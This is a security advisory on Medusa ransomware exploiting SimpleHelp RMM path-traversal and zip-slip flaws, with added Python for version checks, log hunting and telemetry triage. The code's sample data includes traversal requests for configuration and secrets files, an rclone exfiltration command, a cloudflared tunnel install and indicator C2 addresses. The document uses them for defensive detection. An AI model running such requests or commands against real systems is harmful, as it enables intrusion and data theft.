S-RM’s incident response team has observed a significant uptick in ransomware groups using a chain of recently disclosed vulnerabilities in the SimpleHelp Remote Monitoring and Management (RMM) tool to gain access to victims’ networks. In particular we have observed the ransomware group Medusa using this method of entry to target several victims.
The CVEs were assigned on 14 January 2025, following SimpleHelp's release of a patch on 13 January 2025. The vulnerabilities affect versions 5.5.7 and earlier and are tracked as CVE-2024-57726, CVE-2024-57727 and CVE-2024-57728. Organisations using SimpleHelp in-house, or via an outsourced IT managed service provider, should urgently patch the server and rotate the passwords of all SimpleHelp technician accounts to mitigate the issue.
Details of SimpleHelp vulnerabilities
- CVE-2024-57726 (CVSS: 9.9): This vulnerability allows technicians with limited privileges to generate API keys with elevated permissions. Such API keys could be exploited to escalate privileges to the server admin level.
- CVE-2024-57727 (CVSS: 7.5): This flaw involves multiple path traversal vulnerabilities, permitting unauthenticated remote attackers to download arbitrary files from the SimpleHelp host via crafted HTTP requests. These files may reveal server configuration data, including various secrets and hashed user passwords.
- CVE-2024-57728 (CVSS: 7.2): This vulnerability permits admin users to upload arbitrary files anywhere on the SimpleHelp file system via a crafted zip archive (a 'zip slip' attack). This can lead to arbitrary code execution on the host in the context of the SimpleHelp server user.
Potential impact
Although exploitation of CVE-2024-57726 is possible in principle, we have not observed it in any of the SimpleHelp investigations S-RM has completed to date. As of 6 March 2025, Medusa and other threat actors have instead chained CVE-2024-57727 and CVE-2024-57728 to gain administrative access and take control of the SimpleHelp RMM server. Control of the server lets the attacker hijack the active SimpleHelp agents, tamper with their configuration and point them at malicious command-and-control infrastructure. The third vulnerability, CVE-2024-57726, is therefore not needed to fully compromise a SimpleHelp deployment.
Medusa ransomware exploitation of SimpleHelp vulnerabilities
Since 6 February 2025, S-RM has responded to several incidents in which the Medusa ransomware group exploited the SimpleHelp vulnerabilities to gain initial access to victims' infrastructure. Having gained a foothold, the group used the SimpleHelp tooling itself to move laterally through victims' networks, and ultimately to exfiltrate data and encrypt systems.
Across our cases, we see Medusa opt for the following attack chain:
- Exploit CVE-2024-57727: Medusa exploits the path traversal vulnerability to download the SimpleHelp RMM configuration file and other system files from the SimpleHelp management server. Offline, Medusa then cracks the password hashes for the SimpleHelp 'technician' accounts recovered from those files, allowing them to log in remotely as a SimpleHelp technician.
- Exploit CVE-2024-57728: With a technician account in hand, Medusa uses it to exploit the second vulnerability (which, as described above, requires administrative privileges on the server), allowing unauthorised file uploads and remote code execution. They use this access to tamper with the configuration files on the SimpleHelp management server, pointing the existing SimpleHelp RMM agents at their command-and-control servers.
Medusa, a financially motivated ransomware group, has been active since at least 2021 and was among the five most frequently observed threat actors in S-RM's ransomware cases in 2024. Medusa has an established track record of exploiting software vulnerabilities in public-facing infrastructure for initial access: prior to the current campaign, in June 2024, they exploited a SQL injection vulnerability in FortiClient Enterprise Management Server instances to gain access to multiple victims' networks.
Remediation
We urgently advise all organisations running SimpleHelp Remote Monitoring and Management (RMM) software at version 5.5.7 or earlier to apply the following remediation steps:
- SimpleHelp v5.5 users – upgrade to SimpleHelp v5.5.8 or later.
- SimpleHelp v5.4 users – upgrade to SimpleHelp v5.4.10.
- SimpleHelp v5.3 users – upgrade to SimpleHelp v5.3.9.
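The three fixed releases above do not sort in a single numeric order: 5.4.10 and 5.3.9 are both patched, yet a naive comparison against 5.5.7 would flag them as vulnerable. The following Python is an added example, not SimpleHelp's own tooling, that encodes a branch-aware check and runs it over a constructed inventory; the hostnames and versions in it are made up, and branches older than 5.3, for which the advisory lists no fixed release, are treated as needing an upgrade.

```python
"""Branch-aware check of SimpleHelp server versions against the fixed releases
named in the advisory (5.5.8, 5.4.10, 5.3.9). Added example, not vendor code."""
from __future__ import annotations

# First fixed release on each branch the advisory lists a patch for.
FIXED = {
    (5, 5): (5, 5, 8),
    (5, 4): (5, 4, 10),
    (5, 3): (5, 3, 9),
}


def parse_version(text: str) -> tuple[int, ...]:
    """Turn '5.5.7' into (5, 5, 7); anything that is not three integers is rejected."""
    parts = text.strip().split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised SimpleHelp version string: {text!r}")
    return tuple(int(p) for p in parts)


def is_vulnerable(text: str) -> bool:
    """True if this version still needs the CVE-2024-57726/57727/57728 patch.

    The comparison is made within the version's own branch, so 5.4.10 (patched)
    is not reported just because it sorts below 5.5.7 (vulnerable).
    """
    version = parse_version(text)
    branch = version[:2]
    if branch in FIXED:
        return version < FIXED[branch]
    # Branches newer than 5.5 post-date the fix; branches older than 5.3 have
    # no fixed release listed in the advisory, so they must be upgraded (assumption).
    return branch < (5, 3)


def hosts_needing_patch(inventory: dict[str, str]) -> list[str]:
    """Given {hostname: version} from an asset register, list hosts to upgrade."""
    return sorted(host for host, ver in inventory.items() if is_vulnerable(ver))


# Constructed inventory for illustration only.
SAMPLE_INVENTORY = {
    "rmm-prod-01": "5.5.7",
    "rmm-prod-02": "5.5.8",
    "rmm-msp-legacy": "5.4.10",
    "rmm-lab": "5.3.2",
}

if __name__ == "__main__":
    for host in hosts_needing_patch(SAMPLE_INVENTORY):
        print(f"{host}: {SAMPLE_INVENTORY[host]} is vulnerable, upgrade required")
```

Feed `hosts_needing_patch` the version strings your asset register or MSP reports; remember that passing this check says nothing about whether technician credentials were already harvested, which the next paragraphs address.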
S-RM has responded to several cases in which Medusa accessed SimpleHelp management servers after they had been patched, because the technician accounts' credentials were not reset as part of the patching process. Credentials harvested via CVE-2024-57727 before the patch remain valid afterwards, so alongside patching your SimpleHelp RMM management server we strongly recommend resetting the passwords of all accounts associated with the service.
In addition, if you ran a vulnerable version of SimpleHelp for any significant period after the vulnerabilities were disclosed, review your existing security systems and logging platforms, out of an abundance of caution, for evidence that the vulnerabilities have already been exploited to gain access.
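One concrete place to look is the HTTP request log of the management server, or of any proxy in front of it, for the kind of traversal request CVE-2024-57727 involves. The Python below is an added example, not S-RM or SimpleHelp tooling: the log lines are constructed, the combined Apache/nginx log format and the file names in the requests are assumptions, and only `LOG_RE` should need changing if your source logs requests differently. It normalises each path (repeated percent-decoding to catch double encoding, backslashes unified) before looking for a `..` segment, and marks requests that were answered with a body as likely successful.

```python
"""Hunt HTTP access logs for path-traversal requests of the kind CVE-2024-57727
involves. Added example; sample lines are constructed and the combined log
format is an assumption about your environment."""
from __future__ import annotations
import re
from urllib.parse import unquote

# Combined-log-format parser (assumed; adjust for your server or proxy).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample: a benign request, a plain traversal, a double-encoded
# traversal (%252e = encoded '%2e' = encoded '.'), and a backslash variant.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Feb/2025:09:14:02 +0000] "GET /allversions HTTP/1.1" 200 311
203.0.113.7 - - [20/Feb/2025:09:15:10 +0000] "GET /static/../../server-config.xml HTTP/1.1" 200 5120
203.0.113.7 - - [20/Feb/2025:09:15:12 +0000] "GET /static/%252e%252e/%252e%252e/secrets.txt HTTP/1.1" 200 844
198.51.100.9 - - [20/Feb/2025:09:16:40 +0000] "GET /images/..%5c..%5cconfig/users.txt HTTP/1.1" 404 0
"""


def normalise_path(path: str) -> str:
    """Drop the query string, percent-decode until stable (defeats double
    encoding), and unify backslashes so '..\\' is seen as '../'."""
    path = path.split("?", 1)[0]
    for _ in range(4):  # bounded: a crafted path could nest many layers
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def is_traversal(path: str) -> bool:
    """True if any path segment is '..' after normalisation."""
    return ".." in normalise_path(path).split("/")


def hunt(log_text: str) -> list[dict]:
    """Return one finding per traversal request; 'served' is True when the
    server answered 200 with a non-empty body, i.e. a file was likely returned."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_traversal(m["path"]):
            continue
        findings.append({
            "src": m["src"],
            "ts": m["ts"],
            "path": m["path"],
            "normalised": normalise_path(m["path"]),
            "status": int(m["status"]),
            "served": m["status"] == "200" and m["size"] not in ("-", "0"),
        })
    return findings


def sources_to_triage(log_text: str) -> list[str]:
    """Client addresses that had at least one traversal request served."""
    return sorted({f["src"] for f in hunt(log_text) if f["served"]})


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        flag = "SERVED" if f["served"] else "blocked"
        print(f"{f['ts']} {f['src']} {f['normalised']} -> {f['status']} ({flag})")
```

A served traversal request dated before the server was patched is the trigger for the credential reset above: treat every technician password as compromised rather than trying to work out which file was read.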
Post exploitation tactics identified
S-RM's Incident Response team has identified the following tactics, techniques, and procedures (TTPs) employed by threat actors immediately after exploiting the SimpleHelp vulnerabilities:
- Installation of Cloudflared: Attackers have been observed installing Cloudflared as a service on systems where the SimpleHelp agent is present, allowing them to maintain persistent access and facilitate command-and-control activities.
- Execution of RClone: The use of RClone has been detected on affected systems with the SimpleHelp agent. RClone is typically utilized for data exfiltration due to its ability to synchronize files with cloud storage services.
- System Enumeration: Attackers have executed system enumeration commands such as ipconfig /all, sc query, driverquery, net share, net use and nltest /dclist to gather information about the network and system configuration.
- External Connections: There have been connections to the external IP addresses 213.183.63[.]41, 144.217.181[.]205, and 89.36.161[.]17, indicating possible command-and-control or data exfiltration channels.
- Installation of PDQ Deploy: The installation of PDQ Deploy on compromised systems has been identified. This tool can be used for deploying additional malicious tools or payloads across the network. S-RM has observed this tool being used to deploy a Medusa ransomware binary named ‘gaze.exe’.
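The TTPs above are individually noisy (administrators run ipconfig /all too) but rarely co-occur on one host, so a hunt should score hosts by how many distinct TTPs they show. The Python below is an added example, not S-RM tooling, that does this over constructed endpoint telemetry: the event records are made up to resemble flattened Sysmon or EDR process-creation and network-connection events, and their field names are an assumption you will need to map to your own platform. The indicators themselves (the enumeration commands, cloudflared service installation, RClone, PDQ Deploy, gaze.exe and the three IP addresses) come from the list above.

```python
"""Score hosts by the distinct post-exploitation TTPs from the advisory that
appear in their telemetry. Added example; events are constructed and the
record layout is an assumption."""
from __future__ import annotations
from collections import defaultdict
import ntpath

# Advisory indicators (defanged in the text, plain here for matching).
C2_IPS = {"213.183.63.41", "144.217.181.205", "89.36.161.17"}

# (image basename, substring required in the command line); None = any args.
ENUM_COMMANDS = [
    ("ipconfig.exe", "/all"), ("sc.exe", "query"), ("driverquery.exe", None),
    ("net.exe", "share"), ("net.exe", "use"), ("nltest.exe", "dclist"),
]

# Constructed events: WS01 shows enumeration plus a cloudflared service and C2
# traffic, FS02 shows exfiltration and ransomware staging, WS03 is an admin
# running a single ipconfig and should not be prioritised on its own.
SAMPLE_EVENTS = [
    {"host": "WS01", "kind": "process", "image": r"C:\Windows\System32\ipconfig.exe", "cmdline": "ipconfig /all"},
    {"host": "WS01", "kind": "process", "image": r"C:\Windows\System32\net.exe", "cmdline": "net share"},
    {"host": "WS01", "kind": "process", "image": r"C:\Windows\System32\nltest.exe", "cmdline": "nltest /dclist:corp.example"},
    {"host": "WS01", "kind": "process", "image": r"C:\ProgramData\cloudflared.exe", "cmdline": "cloudflared.exe service install <tunnel-token>"},
    {"host": "WS01", "kind": "network", "image": r"C:\ProgramData\cloudflared.exe", "dst_ip": "213.183.63.41"},
    {"host": "FS02", "kind": "process", "image": r"C:\Users\Public\rclone.exe", "cmdline": "rclone.exe copy D:\\Shares exfil:bucket"},
    {"host": "FS02", "kind": "process", "image": r"C:\Users\Public\PDQ Deploy 19.exe", "cmdline": '"PDQ Deploy 19.exe" /s'},
    {"host": "FS02", "kind": "process", "image": r"C:\Users\Public\gaze.exe", "cmdline": "gaze.exe"},
    {"host": "WS03", "kind": "process", "image": r"C:\Windows\System32\ipconfig.exe", "cmdline": "ipconfig /all"},
]


def _base(image: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return ntpath.basename(image).lower()


def classify(ev: dict) -> list[str]:
    """Names of the advisory TTPs a single event matches (possibly none)."""
    hits: list[str] = []
    if ev["kind"] == "network":
        if ev.get("dst_ip") in C2_IPS:
            hits.append("known_c2_ip")
        return hits
    base, cmd = _base(ev["image"]), ev.get("cmdline", "").lower()
    if any(base == exe and (arg is None or arg in cmd) for exe, arg in ENUM_COMMANDS):
        hits.append("enumeration")
    if base == "cloudflared.exe" and "service" in cmd and "install" in cmd:
        hits.append("cloudflared_service")
    if base == "sc.exe" and "create" in cmd and "cloudflared" in cmd:
        hits.append("cloudflared_service")
    if base == "rclone.exe":
        hits.append("rclone")
    if base.startswith("pdq"):  # PDQ Deploy installer and runner binaries
        hits.append("pdq_deploy")
    if base == "gaze.exe":
        hits.append("medusa_binary")
    return hits


def triage(events: list[dict]) -> dict[str, set[str]]:
    """Map each host to the set of distinct TTPs observed on it."""
    per_host: defaultdict[str, set[str]] = defaultdict(set)
    for ev in events:
        for hit in classify(ev):
            per_host[ev["host"]].add(hit)
    return dict(per_host)


def priority_hosts(events: list[dict]) -> list[str]:
    """Hosts with two or more distinct TTPs, or the ransomware binary itself,
    most TTPs first; a lone enumeration command is left for manual review."""
    scored = triage(events)
    picked = [h for h, ttps in scored.items() if len(ttps) >= 2 or "medusa_binary" in ttps]
    return sorted(picked, key=lambda h: (-len(scored[h]), h))


if __name__ == "__main__":
    for host in priority_hosts(SAMPLE_EVENTS):
        print(host, sorted(triage(SAMPLE_EVENTS)[host]))
```

Run `priority_hosts` over the window starting when the SimpleHelp server was exposed, and add the parent process of each hit to the record if your telemetry has it: commands spawned by the SimpleHelp agent service rather than by an interactive shell are the ones most worth pulling first.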
If malicious activity is identified
- Trigger your incident response plan
- Engage your insurance if in place
- Seek the help of an expert cyber incident response legal firm and a technical incident response team
- Preserve evidence (starting with short-lived sources such as firewall logs, which are often overwritten on rotation)
- Work with experts to implement a containment plan and conduct a forensic investigation across impacted devices
Written by Tim Geschwindt and Josh Rawse. Edited by Dan Caplin.
Contact S-RM for further information about the vulnerabilities and response steps.